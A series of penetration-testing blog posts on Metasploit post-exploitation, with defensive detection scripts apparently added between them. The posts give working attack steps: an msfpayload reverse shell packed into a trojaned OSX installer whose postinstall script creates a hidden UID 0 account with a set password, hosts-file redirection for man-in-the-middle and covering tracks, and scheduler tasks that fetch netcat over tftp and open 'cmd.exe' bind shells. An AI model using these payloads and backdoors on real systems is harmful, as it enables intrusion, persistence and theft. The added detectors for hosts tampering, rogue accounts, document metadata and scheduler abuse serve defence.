
Entries by Carlos Perez (157)

Sunday, Jun 14 2009

Hostsedit Meterpreter Script

I recently committed the hostsedit.rb script to the Metasploit SVN. The purpose of this script is to add DNS name mappings into the hosts file on a Windows target host, so that traffic destined for specific records is redirected to an IP address of the attacker's choosing. This is very useful for performing Man In the Middle attacks, or for redirecting traffic meant for management or logging systems to localhost in order to cover one's tracks. To see the options available in the script you simply run it without any options:

meterpreter > run hostsedit
This Meterpreter script is for adding entries in to the Windows Hosts file.
Since Windows will check first the Hosts file instead of the configured DNS Server
it will assist in diverting traffic to the fake entry or entries. Either a single
entry can be provided or a series of entries provided a file with one per line.
OPTIONS:
    -e <opt>  Host entry in the format of IP,Hostname.
    -h        Help Options.
    -l <opt>  Text file with list of entries in the format of IP,Hostname. One per line.
Example:
run hostsedit -e 127.0.0.1,google.com
run hostsedit -l /tmp/fakednsentries.txt

As can be seen from the output above, the script has two main options: the addition of a single record, where the IP and domain name are separated by a comma, or the use of a file where each record to be added is on its own line in the same format. This permits setting hosts depending on the information gathered from the target, or using the script in an automatic fashion where it is set in msfconsole to modify several clients as they connect. In the case of Windows Vista target hosts, the script also detects whether UAC (User Account Control) is enabled, since this will prevent any modification of the target's hosts file.

Example of adding a single record and pointing google.com to another host in the network:

meterpreter > execute -H -c -f "cmd /c ping google.com" -i
Process 3544 created.
Channel 2 created.
Pinging google.com [74.125.127.100] with 32 bytes of data:
Reply from 74.125.127.100: bytes=32 time=238ms TTL=239
Reply from 74.125.127.100: bytes=32 time=224ms TTL=239
Reply from 74.125.127.100: bytes=32 time=256ms TTL=239
Reply from 74.125.127.100: bytes=32 time=278ms TTL=239
Ping statistics for 74.125.127.100:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 224ms, Maximum = 278ms, Average = 249ms
meterpreter > 
meterpreter > run hostsedit -e 192.168.1.120,google.com
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts.back
[*] Adding Record for Host google.com with IP 192.168.1.120
[*] Clearing the DNS Cache
meterpreter > execute -H -c -f "cmd /c ping google.com" -i
Process 2888 created.
Channel 3 created.
Pinging google.com [192.168.1.120] with 32 bytes of data:
Reply from 192.168.1.120: bytes=32 time=1ms TTL=64
Reply from 192.168.1.120: bytes=32 time=2ms TTL=64
Reply from 192.168.1.120: bytes=32 time=1ms TTL=64
Reply from 192.168.1.120: bytes=32 time=2ms TTL=64
Ping statistics for 192.168.1.120:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 2ms, Average = 1ms
meterpreter >

As can be seen from the output, the script first makes a backup of the hosts file, then appends the record to the end of the hosts file and flushes the DNS cache, to make sure that no previous DNS entries for the domain or host we want to redirect remain in the target's cache. Here we see the command for redirecting 2 entries:

msf exploit(handler) > cat /tmp/fakednsentries.txt
[*] exec: cat /tmp/fakednsentries.txt
127.0.0.1,symantec.com
127.0.0.1,microsoft.com
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run hostsedit -l /tmp/fakednsentries.txt
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts.back
[*] Adding Record for Host symantec.com with IP 127.0.0.1
[*] Adding Record for Host microsoft.com with IP 127.0.0.1
[*] Clearing the DNS Cache
meterpreter > execute -H -c -f "cmd /c ping symantec.com" -i
Process 3296 created.
Channel 8 created.
Pinging symantec.com [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time=2ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 2ms, Average = 0ms
meterpreter >
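
A defender-side check for the tampering this script performs, added here as an example and not part of the post or the hostsedit script: it parses a Windows hosts file (a constructed sample containing the three entries shown above), reports every mapping that overrides DNS, and diffs the file against a baseline such as the hosts.back copy the script leaves beside it.

```python
import ipaddress

# Constructed sample of a Windows hosts file after the three entries shown in
# this post were appended (comment header abbreviated).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
192.168.1.120   google.com
127.0.0.1       symantec.com
127.0.0.1       microsoft.com
"""

# Names that a stock hosts file legitimately maps to loopback.
STOCK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Yield (line_no, ip, names) for each active mapping; comments are skipped."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue          # malformed address, not a mapping
        yield n, ip, [f.lower() for f in fields[1:]]


def find_overrides(text, stock=STOCK_NAMES):
    """Return every non-stock mapping with a reason, in file order.

    A hosts entry beats the configured DNS server, so any name listed here is
    one the machine will no longer resolve through DNS at all.
    """
    findings = []
    for n, ip, names in parse_hosts(text):
        for name in names:
            if name in stock:
                continue
            if ip.is_loopback:
                why = "sinkholed to loopback (e.g. updates or logging made unreachable)"
            elif ip.is_private:
                why = "redirected to a LAN address (possible man-in-the-middle)"
            else:
                why = "static override of DNS"
            findings.append({"line": n, "name": name, "ip": str(ip), "why": why})
    return findings


def diff_against_baseline(current, baseline):
    """Mappings present in `current` but absent from `baseline` (for example the
    hosts.back copy the script leaves behind, or a golden-image hosts file)."""
    base = {(str(ip), name) for _, ip, names in parse_hosts(baseline) for name in names}
    return [(str(ip), name) for _, ip, names in parse_hosts(current)
            for name in names if (str(ip), name) not in base]
```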

Thursday, May 21 2009

Video on Using Winenum and Scheduleme Meterpreter Scripts

Windows Enumeration Script for Meterpreter from PaulDotCom on Vimeo.


Do check out the technical segment at Pauldotcom.com, and yes, I'm now part of Pauldotcom.com :-)

Do subscribe to the podcast and check out the Forums; I will be posting to the blog my test scripts that will later be added to the site.

Saturday, Apr 25 2009

Evil Packaging on OSX with Xcode and Metasploit

Mubix did a very good video at Room 362 on packaging a Meterpreter payload with iexpress in Windows to create a trojaned installer for Windows. I decided to give it a spin and make one for OSX; this kind of attack is perfect for many environments since there is no patch for stupidity. Packaging an evil installer gives many vectors for performing attacks, such as placing it on removable media and seeing who picks it up, or social engineering, to name a few.

OSX has a packager named Package Maker that is included with the Xcode development environment on the OSX DVD, or it can be downloaded from http://connect.apple.com. I highly recommend using the version downloaded from the webpage, since this will be the latest version for your Mac. Once the DMG file is downloaded and installed, the tools will be located in the root of your hard drive under Developer.

But before we create the package we must create our payload. For this example I will use a Metasploit Reverse TCP Shell for OSX and a script to create an account with UID 0 for later attacks against the target machine. To generate our payload with the latest Metasploit development version we run the following command:

root@bt:/pentest/exploits/framework3# ./msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.1.103 X > osxexe
Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
 Length: 65
Options: LHOST=192.168.1.103

Now we have an OSX x86 executable payload set to connect back to the attacker's machine 192.168.1.103 on the default port of 4444. We will also create a post-installation script to launch our payload and create an account with UID 0; this will give us root privileges, and the account will not show on the login screen since its UID is under 500. The script looks like this:

#!/bin/sh
# run the backdoor payload that the package installed into /usr/bin
/usr/bin/osxexe &
# create a user account with admin privileges (UID 0, primary group wheel)
dscl . -create /Users/dark
dscl . -create /Users/dark UserShell /bin/bash
dscl . -create /Users/dark RealName "Darkoperator"
dscl . -create /Users/dark UniqueID 0
dscl . -create /Users/dark PrimaryGroupID 0
dscl . -passwd /Users/dark P@55w0rd

This script will launch the payload once it is installed in the /usr/bin path on the target machine, and it will create an account with username dark and password P@55w0rd. We now start Package Maker, which is located in the root of the system HD under Developer/Applications/Utilities, by double-clicking on it. We should be greeted with a screen as follows:

Picture 1

We enter the organization name we want to appear in the properties of the file and the minimum target OS we want this package to run under.

Picture 2

Then we give the package a title and we select that the installation be on the System Volume and give it a description if we want.

Picture 3

We then click on the plus sign at the bottom left of the window and select our payload; if we wish we can also add an OSX app for cover. We set the destination path for the payload and make sure the Require Admin Authentication checkbox is selected, since we want our script and payload to be executed as root.

Picture 4

On the Contents tab we select the payload and set the proper permissions for it, making the owner root and the group admin, and making sure that the file has the execute permission set for the owner and others.

Picture 5

In the Scripts tab we select the script directory where we placed our post-install script and select it as the postinstall script.

Picture 6

Now we click the Build button at the top left to build our pkg file. We place the file in a DMG on a share, on a USB stick, or any other place from where our target will execute the installer thinking it is a valid package.

We prepare our attacking machine in Metasploit to receive the shells that will come from the execution of the trojaned package, and then we wait for the connections:

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD osx/x86/shell_reverse_tcp 
PAYLOAD => osx/x86/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.103 
LHOST => 192.168.1.103
msf exploit(handler) > set ExitOnSeesion false
ExitOnSeesion => false
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.103:4444 -> 192.168.1.120:58942)
id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff)
pwd
/
uname -a
Darwin carlos-perezs-computer.local 9.6.0 Darwin Kernel Version 9.6.0: Mon Nov 24 17:37:00 PST 2008; root:xnu-1228.9.59~1/RELEASE_I386 i386

As you can see, the shell is running under uid 0. This attack can be expanded further by scheduling the payload to run every minute, configuring and starting SSH or Remote Connection (VNC), and disabling the built-in firewall and Little Snitch if present, among many others.
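
The account the post-install script creates is what a defender should be looking for on a Mac. The following is an added example, not part of the post: it parses the output of `dscl . -readall /Users RealName UniqueID UserShell` (a constructed sample; the record separator and `Attribute: value` layout are assumed from that command's output) and flags a second UID 0 account as well as any hidden account below UID 500 that has an interactive shell.

```python
# Constructed sample in the layout of `dscl . -readall /Users RealName UniqueID UserShell`
# (record separator and "Attribute: value" lines assumed from that command's output).
SAMPLE_READALL = """\
-
RecordName: _www
UniqueID: 70
UserShell: /usr/bin/false
-
RecordName: dark
RealName: Darkoperator
UniqueID: 0
UserShell: /bin/bash
-
RecordName: helper
UniqueID: 499
UserShell: /bin/bash
-
RecordName: root
RealName: System Administrator
UniqueID: 0
UserShell: /bin/sh
-
RecordName: carlos
RealName: Carlos
UniqueID: 501
UserShell: /bin/bash
"""

INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/bin/csh", "/bin/tcsh", "/bin/ksh"}
EXPECTED_UID0 = {"root"}     # the only account that should own UID 0
HIDDEN_UID_CEILING = 500     # the login window hides accounts below this, as the post notes


def parse_readall(text):
    """Split dscl -readall output into one dict per record."""
    records, cur = [], {}
    for line in text.splitlines():
        if line.strip() == "-":          # record separator
            if cur:
                records.append(cur)
            cur = {}
            continue
        key, sep, val = line.partition(":")
        if sep:
            cur[key.strip()] = val.strip()
    if cur:
        records.append(cur)
    return records


def find_rogue_accounts(records):
    """Flag extra UID 0 accounts and hidden (UID < 500) accounts that can log in."""
    findings = []
    for r in records:
        name = r.get("RecordName", "?")
        try:
            uid = int(r.get("UniqueID", ""))
        except ValueError:
            continue                     # record without a usable UID
        shell = r.get("UserShell", "")
        if uid == 0 and name not in EXPECTED_UID0:
            findings.append((name, "second UID 0 account: root-equivalent, invisible at login"))
        elif (uid < HIDDEN_UID_CEILING and shell in INTERACTIVE_SHELLS
              and not name.startswith("_") and name not in EXPECTED_UID0):
            findings.append((name, "hidden low-UID account with an interactive shell"))
    return findings
```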

Thursday, Apr 23 2009

Metadata Enumeration with FOCA

One very important part of any pentest is the gathering of information about the target network that will be attacked, and one area that is gaining a lot of traction is enumeration through metadata. A tool I recently learned about by listening to the great podcast Exotic Liability, where they mentioned the FOCA tool by Informatica64 when talking about their presentation at Blackhat Europe 09: you can either download the FOCA tool or use the webpage to submit your document for analysis. I prefer to do most of my analysis locally, since on almost all pentests I have conducted all information is confidential and sharing it with third parties is not permitted. This tool will analyze metadata from Microsoft Office documents, PDF files, OpenOffice files and WordPerfect files, as well as EXIF metadata out of images, and the best part is that you can add the files you collected manually or found and downloaded through web searches using Google and Live Search, which makes it extremely flexible for pentests. It will enumerate users, folders, printers, emails and the version of the software used to create the file. This tool will run on Windows XP and Windows Vista; I found it to be really unstable in Windows 7 Beta.

After downloading, run the setup executable and the tool will be available in the Start menu under Programs. Once you execute the application you should see a screen like this one:

image

You can press Project –> New Project to start a new project, where you give the project name, the website to enumerate for documents, and a place to download and store the documents.

image

You can instead add a single file or a folder of files that you have gathered previously via email, social engineering or any other way, by right-clicking on the document list area and choosing either the Add File or Add Folder option.

image

When you select to create a New Project, the screen will change in the following manner, giving you the option of which file types to download and what search engine to use.

image

But what if the file type you are looking for is not in the options, like PNG or JPG? You can click on the Custom Search link and enter the Google query yourself, or add filetype:<extension> as shown in the image below.

image

For the following screenshots I will enumerate and download only doc files from Blackhat.com, so I hit Search and you can see the files that were found; once it has finished you can right-click and download only specific files, or choose to download them all. Once downloaded, you can right-click again on them and choose to extract the metadata of a single file or of all the files.

image

Once it has finished extracting all the metadata you can look at it by clicking on the type, or go to Documents, select the document and click on it to get even more information not classified in the types given, like EXIF data. Here I clicked on the Folders tab, and you can see I can identify usernames, locations, servers and paths on the network where these documents were created and stored; on some I have tested I was even able to enumerate SharePoint server structures.

image

This information can be exported into a text file by right-clicking on the attribute and choosing to export the data to a file; this can later be used to feed the data into other tools, or to gain information for further attacks like finding types of printers that can be used to store files or be exploited since embedded device security tends to be low, or attacking shares by dropping Office documents with Meterpreter VBA shells or setting autorun.inf files to launch payloads or exploits on client PCs. The options are many.

I will definitely be adding this tool to my toolbox and making it part of my methodology when executing target enumeration during pentests. I hope you find this information useful, and special thanks to the Exotic Liability team for mentioning this tool.
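
The fields FOCA harvests (authors, company, software version, server and folder paths) are exactly what a document owner should strip before publishing. The following is an added example, not FOCA's code or anything from the post: it opens an Office Open XML package (a minimal .docx constructed inline) and pulls the author and last-editor names from docProps/core.xml, the company and application version from docProps/app.xml, and any UNC or drive-letter paths from the relationship parts, which is where an attached template on an internal file server leaks.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
# UNC (\\server\share\...) or drive-letter (C:\...) paths, optionally as file:/// URIs.
PATH_RE = re.compile(r'(?:file:///)?(?:\\\\[\w.-]+\\[^\s"<]+|[A-Za-z]:\\[^\s"<]+)')


def extract_metadata(data: bytes) -> dict:
    """Pull the fields FOCA-style tools harvest out of one OOXML package."""
    found = {"users": set(), "company": None, "software": None, "paths": set()}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:                 # author / last editor
            root = ET.fromstring(z.read("docProps/core.xml"))
            for tag in ("dc:creator", "cp:lastModifiedBy"):
                el = root.find(tag, NS)
                if el is not None and el.text:
                    found["users"].add(el.text.strip())
        if "docProps/app.xml" in names:                  # company and software version
            root = ET.fromstring(z.read("docProps/app.xml"))
            comp, app, ver = (root.find(t, NS) for t in ("ep:Company", "ep:Application", "ep:AppVersion"))
            found["company"] = comp.text if comp is not None else None
            if app is not None:
                found["software"] = " ".join(x.text for x in (app, ver) if x is not None and x.text)
        # Relationship and settings parts carry template, printer and link paths:
        # this is where server names and internal folder structure leak.
        for name in names:
            if name.endswith(".rels") or name.endswith("settings.xml"):
                for m in PATH_RE.findall(z.read(name).decode("utf-8", "replace")):
                    found["paths"].add(m.replace("file:///", ""))
    return found


def build_sample_docx() -> bytes:
    """Constructed sample: the minimal parts of a .docx that leak metadata."""
    core = ('<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s"><dc:creator>jsmith</dc:creator>'
            '<cp:lastModifiedBy>ACMEINC\\mjones</cp:lastModifiedBy></cp:coreProperties>'
            % (NS["cp"], NS["dc"]))
    app = ('<Properties xmlns="%s"><Application>Microsoft Office Word</Application>'
           '<AppVersion>12.0000</AppVersion><Company>ACME Inc</Company></Properties>' % NS["ep"])
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            r'<Relationship Id="rId1" Type="attachedTemplate" TargetMode="External" '
            r'Target="file:///\\fileserver01\templates\corp.dotm"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def audit(data: bytes) -> list:
    """Human-readable findings for a single document, users first."""
    md = extract_metadata(data)
    out = [f"user: {u}" for u in sorted(md["users"])]
    if md["company"]:
        out.append(f"company: {md['company']}")
    if md["software"]:
        out.append(f"software: {md['software']}")
    out += [f"path: {p}" for p in sorted(md["paths"])]
    return out
```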

Saturday, Apr 11 2009

Abusing the Scheduler with Meterpreter

Recently I had a chance to look at Val Smith and Colin Ames' presentation from Defcon 16 called Meta-Post Exploitation. In the presentation they talk about many post-exploitation techniques I already knew, as well as some new approaches to others. Three specific tools that were demoed caught my attention, among them MassWinenum and AtAbuse. I quickly modified my Remotewinenum script to support multiple targets, quite an easy task since most of the work was already done; the only difference is that I use WMIC to achieve this. I like to be as stealthy as possible and use the built-in tools as much as I can to my advantage. Here is a sample of the execution of the script:

meterpreter > run remotewinenum -t 192.168.1.7,192.168.1.8
[*] Running Enumeration against 192.168.1.7
[*] Saving report to /home/carlos/.msf3/logs/remotewinenum/192.168.1.7_20090410.0206
[*] Running WMIC Commands ....
[*] running command wimic environment list
[*] running command wimic share list
[*] running command wimic nicconfig list
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group list
[*] running command wimic sysaccount list
[*] running command wimic volume list brief
[*] running command wimic logicaldisk get description,filesystem,name,size
[*] running command wimic netlogin get name,lastlogon,badpasswordcount
[*] running command wimic netclient list brief
[*] running command wimic netuse get name,username,connectiontype,localname
[*] running command wimic share get name,path
[*] running command wimic nteventlog get path,filename,writeable
[*] running command wimic service list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic rdtoggle list
[*] running command wimic product get name,version
[*] running command wimic qfe list
[*] Running Enumeration against 192.168.1.8
[*] Saving report to /home/carlos/.msf3/logs/remotewinenum/192.168.1.8_20090410.0206
[*] Running WMIC Commands ....
[*] running command wimic environment list
[*] running command wimic share list
[*] running command wimic nicconfig list
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group list
[*] running command wimic sysaccount list
[*] running command wimic volume list brief
[*] running command wimic logicaldisk get description,filesystem,name,size
[*] running command wimic netlogin get name,lastlogon,badpasswordcount
[*] running command wimic netclient list brief
[*] running command wimic netuse get name,username,connectiontype,localname
[*] running command wimic share get name,path
[*] running command wimic nteventlog get path,filename,writeable
[*] running command wimic service list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic rdtoggle list
[*] running command wimic product get name,version
[*] running command wimic qfe list
meterpreter >

As can be seen, a comma-separated target list can now be provided, and the tool will execute either under the privileges under which Meterpreter is running or under a username and password provided, with each host's report saved in a different file and location for later analysis.

The tool that drew most of my attention was the AtAbuser, since its concept is extremely simple. For a long time I had been using the scheduler to schedule backdoors and for privilege escalation, but Val Smith's tool used it for remote command execution, and since the privileges it runs under are System this makes it a very powerful tool; as indicated in the talk, the Scheduler service is one that is overlooked by many when hardening their servers. A set of tools came from this. The first one I call Scheduleme, which assists in scheduling tasks on a local or remote target.

meterpreter > run scheduleme 
Scheduleme Meterpreter Script
This script provides most common scheduling types used during a pentest.
It has the functionality to upload a desired executable or script and schedule
the file uploaded. All scheduled task are as System so Meterpreter process must
be System or local admin for local schedules and Administrator for remore shcedules
-h Help menu.
-c <opt> Command to execute at the given time. If options for execution needed use double quotes
-d Daily.
-hr <opt> Every specified hours 1-23.
-m <opt> Every specified amount of minutes 1-1439
-l When a user logs on.
-s At system startup.
-i Run command imediatly and only once.
-r Remote Schedule. Executable has to be already on remote target
-e <opt> Executable or script to upload to target host, will not work with remote schedule
-o <opt> Options for executable when upload method used
-u Username of account with administrative privelages.
-p Password for account provided.
-t <opt> Remote system to schedule job.
meterpreter >

It also has the capability of uploading an executable and scheduling it on the target under which the Meterpreter session is running. The options for scheduling are:

  • Hourly
  • Minutes
  • At user logon
  • At system startup
  • Immediately

The script will run either at the privilege level under which Meterpreter is running or under the credentials provided, both for local and remote execution. I recently used this script in a pentest where I was able to gain access to a Windows 2008 server, but due to the protection in Windows 2008 I could not dump the hashes even as Administrator, so I scheduled a second Meterpreter payload to run immediately, and since the schedules are done as System I was able to dump the hashes. The uploaded files are stored in the directory given by the %TEMP% environment variable and receive a random name.

Setting a Netcat backdoor: the first example will upload and set the backdoor, the second one is for the case where the file already exists on the target machine:

meterpreter > run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
[*] Uploadingd /tmp/nc.exe....
[*] /tmp/nc.exe uploaded!
[*] Scheduling command C:\DOCUME~1\labuser\LOCALS~1\
Temp\svhost46.exe -e cmd.exe -L -p 8080 to run minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck93 /F

meterpreter > run scheduleme -m 1 -c "C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe -e cmd.exe -L -p 8088"
[*] Scheduling command C:DOCUME~1labuserLOCALS~1Tempsvhost46.exe -e cmd.exe -L -p 8088 to run minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck47 /F

The other script, which acts a bit more like the AtAbuser script that Val Smith demoed in his talk, is Schtasksabuse. As the name implies, it uses the schtasks command instead of AT; one of the main reasons is flexibility, and that flexibility makes it a more complex command to use in a shell but perfect for being scripted. The script takes a comma-separated list of commands and executes each of them by scheduling the task, running the task immediately, waiting a specified time frame and then deleting the task. Just like the other scripts, it will use the privileges of the process under which Meterpreter is running, or credentials can be provided. All commands will be executed under the context of System on the target box, making this a very powerful tool under the right circumstances.

meterpreter > run schtasksabuse 
Meterpreter session running as ACMEINC\Administrator
This Meterpreter script is for running commands on targets system using the
Windows Scheduler, it is based on the tool presented but not released by Val Smith
in Defcon 16 ATAbuser. If no user and password is given it will use the permissions
of the process Meterpreter is running under.
Options:

OPTIONS:

-c <opt> Commands to execute. Several command can be given but separated by commas and enclose the list in doble quotes if arguments are used.
-d <opt> Delay between the execution of commands in seconds, default is 2 seconds if not given.
-h Help menu.
-p <opt> Password for user account specified, it must be given if a user is given.
-t <opt> Remote system to schedule job.
-u <opt> Username to schedule task, if none is given the current user credentials will be used.

An example of a run of the script that downloads Netcat via tftp and then runs it as a backdoor:

meterpreter > run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
Meterpreter session running as ACMEINC\Administrator
[*] Scheduling command tftp -i 192.168.1.8 GET nc.exe to run .....
[*] The scheduled task has been successfully created
[*] Running command on 192.168.1.7
[*] Removing scheduled task
[*] Scheduling command nc -L -p 8080 -e cmd.exe to run .....
[*] The scheduled task has been successfully created
[*] Running command on 192.168.1.7
[*] Removing scheduled task
meterpreter >

This can be used to start services, upload payloads, run fgdump, or execute any other set of tools or commands.
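
Every task these scripts create is visible to the target's own scheduler, which is where a defender catches them. The following is an added example, not part of the post or of the scheduleme/schtasksabuse scripts: it reads scheduled tasks in the CSV layout of `schtasks /query /fo csv /v` (a constructed sample whose column names are assumed from that format; the first row mirrors the syscheck93 task the scheduleme run above creates) and flags the traits that run shows, namely a binary staged in a Temp folder, cmd.exe handed to another program, the syscheckNN naming, and a one-minute repeat as SYSTEM.

```python
import csv
import io
import re

# Constructed sample in the layout of `schtasks /query /fo csv /v` (column names
# assumed from that format; only the columns this check reads are included).
# Row 1 mirrors the task the scheduleme run above creates.
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type","Repeat: Every"
"LABPC","\syscheck93","C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe -e cmd.exe -L -p 8080","SYSTEM","Minute","0:01:00"
"LABPC","\GoogleUpdateTaskMachineUA","C:\Program Files\Google\Update\GoogleUpdate.exe /ua","SYSTEM","Hourly","1:00:00"
"LABPC","\NightlyBackup","C:\Windows\system32\wbadmin.exe start backup","SYSTEM","Daily","N/A"
'''

TEMP_DIR_RE = re.compile(r"\\temp\\", re.I)                 # staged in a Temp folder
SHELL_ARG_RE = re.compile(r"\s-e\s+cmd(?:\.exe)?\b", re.I)  # 'nc -e cmd.exe' style shell
SCRIPT_NAME_RE = re.compile(r"^\\?syscheck\d+$", re.I)      # names scheduleme assigns
FAST_REPEAT_SECONDS = 300                                   # repeat interval worth a look


def interval_seconds(value):
    """'0:01:00' -> 60; 'N/A' or anything else unparsable -> None."""
    m = re.fullmatch(r"(\d+):(\d{2}):(\d{2})", value.strip())
    if not m:
        return None
    h, mi, s = (int(x) for x in m.groups())
    return h * 3600 + mi * 60 + s


def assess_task(row):
    """Return the reasons one task row looks like scheduler abuse (empty if clean)."""
    reasons = []
    cmd = row.get("Task To Run", "")
    if TEMP_DIR_RE.search(cmd):
        reasons.append("binary runs from a Temp directory")
    if SHELL_ARG_RE.search(cmd):
        reasons.append("cmd.exe passed as an argument (bind/reverse shell pattern)")
    if SCRIPT_NAME_RE.match(row.get("TaskName", "")):
        reasons.append("task name matches the syscheckNN pattern")
    secs = interval_seconds(row.get("Repeat: Every", ""))
    if secs is not None and secs <= FAST_REPEAT_SECONDS and row.get("Run As User", "").upper() == "SYSTEM":
        reasons.append(f"repeats every {secs}s as SYSTEM")
    return reasons


def find_suspicious_tasks(csv_text):
    """Map task name -> reasons for every task that trips at least one rule."""
    findings = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = assess_task(row)
        if reasons:
            findings[row["TaskName"]] = reasons
    return findings
```

Each rule alone produces noise on a real host (installers stage from Temp, backup jobs run as SYSTEM), so it is the combination of reasons on one task that warrants a look.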

I hope that these tools are helpful, and all feedback is welcome. I will submit these tools to the Metasploit project for approval to be committed into the current development branch.